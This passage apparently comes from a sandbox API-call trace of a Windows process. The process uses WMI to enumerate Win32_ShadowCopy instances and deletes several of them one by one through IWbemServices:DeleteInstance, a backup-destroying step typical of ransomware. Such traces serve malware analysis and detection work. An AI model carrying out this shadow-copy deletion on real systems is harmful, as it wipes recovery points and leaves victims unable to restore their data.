puCount=0x1c90d450 | out: puCount=0x1c90d450*=0x2) returned 0x0 [0138.195] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d450*=0x17, pszText=0x0) returned 0x0 [0138.196] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d450*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0138.196] CoGetContextToken (in: pToken=0x1c90d2e0 | out: pToken=0x1c90d2e0) returned 0x0 [0138.196] WbemLocator:IUnknown:AddRef (This=0x1b92e6f0) returned 0x3 [0138.196] WbemLocator:IUnknown:QueryInterface (in: This=0x1b92e6f0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90ceb0 | out: ppvObject=0x1c90ceb0*=0x1b92e6f0) returned 0x0 [0138.196] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x3 [0138.196] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x2 [0138.197] IWbemClassObject:Get (in: This=0x1be5a8c0, wszName="__GENUS", lFlags=0, pVal=0x1c90d440*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d43c*=0, plFlavor=0x1c90d438*=0 | out: pVal=0x1c90d440*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90d43c*=3, plFlavor=0x1c90d438*=64) returned 0x0 [0138.197] WbemDefPath:IWbemPath:GetText (in: This=0x1be53250, lFlags=2, puBuffLength=0x1c90d510*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d510*=0x3d, pszText=0x0) returned 0x0 [0138.197] WbemDefPath:IWbemPath:GetText (in: This=0x1be53250, lFlags=2, puBuffLength=0x1c90d510*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d510*=0x3d, pszText="Win32_ShadowCopy.ID=\"{1EE90775-4E53-4C29-811E-F4996057D94E}\"") returned 0x0 [0138.197] IWbemServices:DeleteInstance (in: This=0x1be444f8, strObjectPath="Win32_ShadowCopy.ID=\"{1EE90775-4E53-4C29-811E-F4996057D94E}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0139.860] CoTaskMemAlloc (cb=0x8) returned 0x16a900 [0139.860] IEnumWbemClassObject:Next (in: This=0x1be44788, lTimeout=-1, uCount=0x1, apObjects=0x16a900, puReturned=0x1c90de18 | out: apObjects=0x16a900*=0x1be5af10, puReturned=0x1c90de18*=0x1) returned 0x0 [0139.862] IUnknown:QueryInterface (in: This=0x1be5af10, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d140 | out: ppvObject=0x1c90d140*=0x1be5af10) returned 0x0 [0139.863] IUnknown:QueryInterface (in: This=0x1be5af10, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90d1c0 | out: ppvObject=0x1c90d1c0*=0x0) returned 0x80004002 [0139.863] IUnknown:QueryInterface (in: This=0x1be5af10, riid=0x7fef2d6d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90cf58 | out: ppvObject=0x1c90cf58*=0x0) returned 0x80004002 [0139.863] IUnknown:AddRef (This=0x1be5af10) returned 0x3 [0139.863] CoGetContextToken (in: pToken=0x1c90ce10 | out: pToken=0x1c90ce10) returned 0x0 [0139.863] IUnknown:QueryInterface (in: This=0x1be5af10, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cdd0 | out: ppvObject=0x1c90cdd0*=0x1be5af18) returned 0x0 [0139.863] IMarshal:GetUnmarshalClass (in: This=0x1be5af18, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90ce00 | out: pCid=0x1c90ce00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0139.864] IUnknown:Release (This=0x1be5af18) returned 0x3 [0139.864] CoGetContextToken (in: pToken=0x1c90cde0 | out: pToken=0x1c90cde0) returned 0x0 [0139.864] IUnknown:AddRef (This=0x1be5af10) returned 0x4 [0139.864] IUnknown:QueryInterface (in: This=0x1be5af10, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cef8 | out: ppvObject=0x1c90cef8*=0x0) returned 0x80004002 [0139.864] IUnknown:Release (This=0x1be5af10) returned 0x3 [0139.864] IUnknown:Release (This=0x1be5af10) returned 0x2 [0139.864] CoGetContextToken (in: pToken=0x1c90d2a0 | out: pToken=0x1c90d2a0) returned 0x0 [0139.864] CoGetContextToken (in: pToken=0x1c90d1e0 | out: pToken=0x1c90d1e0) returned 0x0 [0139.864] IUnknown:AddRef (This=0x1be5af10) returned 0x3 [0139.865] IUnknown:QueryInterface (in: This=0x1be5af10, riid=0x1c90d320*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c90d300 | out: ppvObject=0x1c90d300*=0x1be5af10) returned 0x0 [0139.865] IUnknown:Release (This=0x1be5af10) returned 0x3 [0139.865] IUnknown:Release (This=0x1be5af10) returned 0x2 [0139.865] IUnknown:Release (This=0x1be5af10) returned 0x1 [0139.865] CoTaskMemFree (pv=0x16a900) [0139.865] CoGetContextToken (in: pToken=0x1c90dc20 | out: pToken=0x1c90dc20) returned 0x0 [0139.865] IUnknown:AddRef (This=0x1be5af10) returned 0x2 [0139.865] IWbemClassObject:Get (in: This=0x1be5af10, wszName="__GENUS", lFlags=0, pVal=0x1c90dd90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd8c*=0, plFlavor=0x1c90dd88*=0 | out: pVal=0x1c90dd90*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90dd8c*=3, plFlavor=0x1c90dd88*=64) returned 0x0 [0139.866] IWbemClassObject:Get (in: This=0x1be5af10, wszName="__PATH", lFlags=0, pVal=0x1c90dd30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd2c*=0, plFlavor=0x1c90dd28*=0 | out: pVal=0x1c90dd30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{DC780020-7243-4B55-80A9-4BA6EE67823B}\"", varVal2=0x0), pType=0x1c90dd2c*=8, plFlavor=0x1c90dd28*=64) returned 0x0 [0139.866] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{DC780020-7243-4B55-80A9-4BA6EE67823B}\"") returned 0x53 [0139.866] CoGetObjectContext (in: riid=0x1c90dcc8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90dcc0 | out: ppv=0x1c90dcc0*=0x142498) returned 0x0 [0139.866] IComThreadingInfo:GetCurrentApartmentType (in: This=0x142498, pAptType=0x1c90dce0 | out: pAptType=0x1c90dce0*=1) returned 0x0 [0139.866] IUnknown:QueryInterface (in: This=0x142498, riid=0x30db210*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c90dde8 | out: ppvObject=0x1c90dde8*=0x0) returned 0x80004002 [0139.866] IUnknown:Release (This=0x142498) returned 0x1 [0139.867] CoGetClassObject (in: rclsid=0x1b90a7f8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90d350 | out: ppv=0x1c90d350*=0x1be5a250) returned 0x0 [0139.867] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be5a250, riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90d060 | out: ppvObject=0x1c90d060*=0x0) returned 0x80004002 [0139.867] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1be5a250, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d048 | out: ppvObject=0x1c90d048*=0x1be53310) returned 0x0 [0139.868] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53310, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cf50 | out: ppvObject=0x1c90cf50*=0x1be53310) returned 0x0 [0139.868] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53310, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90cfd0 | out: ppvObject=0x1c90cfd0*=0x0) returned 0x80004002 [0139.868] WbemDefPath:IUnknown:AddRef (This=0x1be53310) returned 0x3 [0139.868] CoGetContextToken (in: pToken=0x1c90cc20 | out: pToken=0x1c90cc20) returned 0x0 [0139.868] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53310, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cbe0 | out: ppvObject=0x1c90cbe0*=0x1b937300) returned 0x0 [0139.868] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b937300, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90cc10 | out: pCid=0x1c90cc10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0139.868] WbemDefPath:IUnknown:Release (This=0x1b937300) returned 0x3 [0139.869] CoGetContextToken (in: pToken=0x1c90cbf0 | out: pToken=0x1c90cbf0) returned 0x0 [0139.869] WbemDefPath:IUnknown:AddRef (This=0x1be53310) returned 0x4 [0139.869] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53310, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cd08 | out: ppvObject=0x1c90cd08*=0x0) returned 0x80004002 [0139.869] WbemDefPath:IUnknown:Release (This=0x1be53310) returned 0x3 [0139.869] WbemDefPath:IUnknown:Release (This=0x1be53310) returned 0x2 [0139.869] WbemDefPath:IUnknown:Release (This=0x1be5a250) returned 0x0 [0139.869] WbemDefPath:IUnknown:Release (This=0x1be53310) returned 0x1 [0139.870] CoGetContextToken (in: pToken=0x1c90d920 | out: pToken=0x1c90d920) returned 0x0 [0139.870] CoGetContextToken (in: pToken=0x1c90d860 | out: pToken=0x1c90d860) returned 0x0 [0139.870] WbemDefPath:IUnknown:AddRef (This=0x1be53310) returned 0x2 [0139.870] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53310, riid=0x1c90d9a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90d980 | out: ppvObject=0x1c90d980*=0x1be53310) returned 0x0 [0139.870] WbemDefPath:IUnknown:Release (This=0x1be53310) returned 0x2 [0139.870] WbemDefPath:IUnknown:Release (This=0x1be53310) returned 0x1 [0139.870] CoGetContextToken (in: pToken=0x1c90daa0 | out: pToken=0x1c90daa0) returned 0x0 [0139.870] CoGetContextToken (in: pToken=0x1c90d9e0 | out: pToken=0x1c90d9e0) returned 0x0 [0139.870] WbemDefPath:IUnknown:AddRef (This=0x1be53310) returned 0x2 [0139.870] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53310, riid=0x1c90db20*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90db00 | out: ppvObject=0x1c90db00*=0x1be53310) returned 0x0 [0139.871] WbemDefPath:IUnknown:Release (This=0x1be53310) returned 0x2 [0139.871] WbemDefPath:IUnknown:AddRef (This=0x1be53310) returned 0x3 [0139.871] WbemDefPath:IWbemPath:SetText (This=0x1be53310, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{DC780020-7243-4B55-80A9-4BA6EE67823B}\"") returned 0x0 [0139.872] WbemDefPath:IUnknown:Release (This=0x1be53310) returned 0x2 [0139.872] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90dd60 | out: puCount=0x1c90dd60*=0x2) returned 0x0 [0139.872] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x0, pszText=0x0 | out: puBuffLength=0x1c90dd60*=0x17, pszText=0x0) returned 0x0 [0139.872] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90dd60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0139.872] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0139.872] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0139.872] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0139.872] IWbemClassObject:Get (in: This=0x1be5af10, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0139.872] SysStringLen (param_1="root\\cimv2") returned 0xa [0139.872] IWbemClassObject:Get (in: This=0x1be5af10, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0139.872] SysStringLen (param_1="root\\cimv2") returned 0xa [0139.873] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0139.873] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0139.873] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0139.873] IWbemClassObject:Get (in: This=0x1be5af10, wszName="__CLASS", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0139.873] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0139.873] IWbemClassObject:Get (in: This=0x1be5af10, wszName="__CLASS", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0139.873] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0139.873] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be53310, puCount=0x1c90d500 | out: puCount=0x1c90d500*=0x2) returned 0x0 [0139.874] WbemDefPath:IWbemPath:GetText (in: This=0x1be53310, lFlags=4, puBuffLength=0x1c90d500*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d500*=0x54, pszText=0x0) returned 0x0 [0139.874] WbemDefPath:IWbemPath:GetText (in: This=0x1be53310, lFlags=4, puBuffLength=0x1c90d500*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d500*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{DC780020-7243-4B55-80A9-4BA6EE67823B}\"") returned 0x0 [0139.874] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d450 | out: puCount=0x1c90d450*=0x2) returned 0x0 [0139.874] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d450*=0x17, pszText=0x0) returned 0x0 [0139.874] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d450*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0139.874] CoGetContextToken (in: pToken=0x1c90d2e0 | out: pToken=0x1c90d2e0) returned 0x0 [0139.874] WbemLocator:IUnknown:AddRef (This=0x1b92e6f0) returned 0x3 [0139.874] WbemLocator:IUnknown:QueryInterface (in: This=0x1b92e6f0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90ceb0 | out: ppvObject=0x1c90ceb0*=0x1b92e6f0) returned 0x0 [0139.875] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x3 [0139.875] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x2 [0139.875] IWbemClassObject:Get (in: This=0x1be5af10, wszName="__GENUS", lFlags=0, pVal=0x1c90d440*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d43c*=0, plFlavor=0x1c90d438*=0 | out: pVal=0x1c90d440*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90d43c*=3, plFlavor=0x1c90d438*=64) returned 0x0 [0139.875] WbemDefPath:IWbemPath:GetText (in: This=0x1be53310, lFlags=2, puBuffLength=0x1c90d510*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d510*=0x3d, pszText=0x0) returned 0x0 [0139.875] WbemDefPath:IWbemPath:GetText (in: This=0x1be53310, lFlags=2, puBuffLength=0x1c90d510*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d510*=0x3d, pszText="Win32_ShadowCopy.ID=\"{DC780020-7243-4B55-80A9-4BA6EE67823B}\"") returned 0x0 [0139.875] IWbemServices:DeleteInstance (in: This=0x1be444f8, strObjectPath="Win32_ShadowCopy.ID=\"{DC780020-7243-4B55-80A9-4BA6EE67823B}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0141.101] CoTaskMemAlloc (cb=0x8) returned 0x16a900 [0141.101] IEnumWbemClassObject:Next (in: This=0x1be44788, lTimeout=-1, uCount=0x1, apObjects=0x16a900, puReturned=0x1c90de18 | out: apObjects=0x16a900*=0x1be5ff20, puReturned=0x1c90de18*=0x1) returned 0x0 [0141.104] IUnknown:QueryInterface (in: This=0x1be5ff20, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d140 | out: ppvObject=0x1c90d140*=0x1be5ff20) returned 0x0 [0141.104] IUnknown:QueryInterface (in: This=0x1be5ff20, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90d1c0 | out: ppvObject=0x1c90d1c0*=0x0) returned 0x80004002 [0141.104] IUnknown:QueryInterface (in: This=0x1be5ff20, riid=0x7fef2d6d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90cf58 | out: ppvObject=0x1c90cf58*=0x0) returned 0x80004002 [0141.104] IUnknown:AddRef (This=0x1be5ff20) returned 0x3 [0141.104] CoGetContextToken (in: pToken=0x1c90ce10 | out: pToken=0x1c90ce10) returned 0x0 [0141.104] IUnknown:QueryInterface (in: This=0x1be5ff20, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cdd0 | out: ppvObject=0x1c90cdd0*=0x1be5ff28) returned 0x0 [0141.104] IMarshal:GetUnmarshalClass (in: This=0x1be5ff28, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90ce00 | out: pCid=0x1c90ce00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0141.105] IUnknown:Release (This=0x1be5ff28) returned 0x3 [0141.105] CoGetContextToken (in: pToken=0x1c90cde0 | out: pToken=0x1c90cde0) returned 0x0 [0141.105] IUnknown:AddRef (This=0x1be5ff20) returned 0x4 [0141.105] IUnknown:QueryInterface (in: This=0x1be5ff20, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cef8 | out: ppvObject=0x1c90cef8*=0x0) returned 0x80004002 [0141.105] IUnknown:Release (This=0x1be5ff20) returned 0x3 [0141.105] IUnknown:Release (This=0x1be5ff20) returned 0x2 [0141.105] CoGetContextToken (in: pToken=0x1c90d2a0 | out: pToken=0x1c90d2a0) returned 0x0 [0141.105] CoGetContextToken (in: pToken=0x1c90d1e0 | out: pToken=0x1c90d1e0) returned 0x0 [0141.105] IUnknown:AddRef (This=0x1be5ff20) returned 0x3 [0141.105] IUnknown:QueryInterface (in: This=0x1be5ff20, riid=0x1c90d320*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c90d300 | out: ppvObject=0x1c90d300*=0x1be5ff20) returned 0x0 [0141.106] IUnknown:Release (This=0x1be5ff20) returned 0x3 [0141.106] IUnknown:Release (This=0x1be5ff20) returned 0x2 [0141.106] IUnknown:Release (This=0x1be5ff20) returned 0x1 [0141.106] CoTaskMemFree (pv=0x16a900) [0141.106] CoGetContextToken (in: pToken=0x1c90dc20 | out: pToken=0x1c90dc20) returned 0x0 [0141.106] IUnknown:AddRef (This=0x1be5ff20) returned 0x2 [0141.107] IWbemClassObject:Get (in: This=0x1be5ff20, wszName="__GENUS", lFlags=0, pVal=0x1c90dd90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd8c*=0, plFlavor=0x1c90dd88*=0 | out: pVal=0x1c90dd90*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90dd8c*=3, plFlavor=0x1c90dd88*=64) returned 0x0 [0141.107] IWbemClassObject:Get (in: This=0x1be5ff20, wszName="__PATH", lFlags=0, pVal=0x1c90dd30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd2c*=0, plFlavor=0x1c90dd28*=0 | out: pVal=0x1c90dd30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{3DBBFF70-A67F-4333-8498-31E7BC089E0F}\"", varVal2=0x0), pType=0x1c90dd2c*=8, plFlavor=0x1c90dd28*=64) returned 0x0 [0141.107] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{3DBBFF70-A67F-4333-8498-31E7BC089E0F}\"") returned 0x53 [0141.107] CoGetObjectContext (in: riid=0x1c90dcc8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, 